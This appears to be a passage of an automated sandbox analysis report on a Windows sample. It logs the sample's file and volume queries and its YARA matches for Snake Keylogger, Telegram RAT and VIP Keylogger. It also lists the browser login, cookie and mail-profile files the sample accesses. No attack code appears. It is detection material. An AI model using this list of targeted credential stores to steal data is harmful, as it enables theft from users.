Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Users\user\Desktop\2Lzx7LMDWV.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7620, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7620, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4145541161.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7620, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2Lzx7LMDWV.exe PID: 7416, type: MEMORYSTR
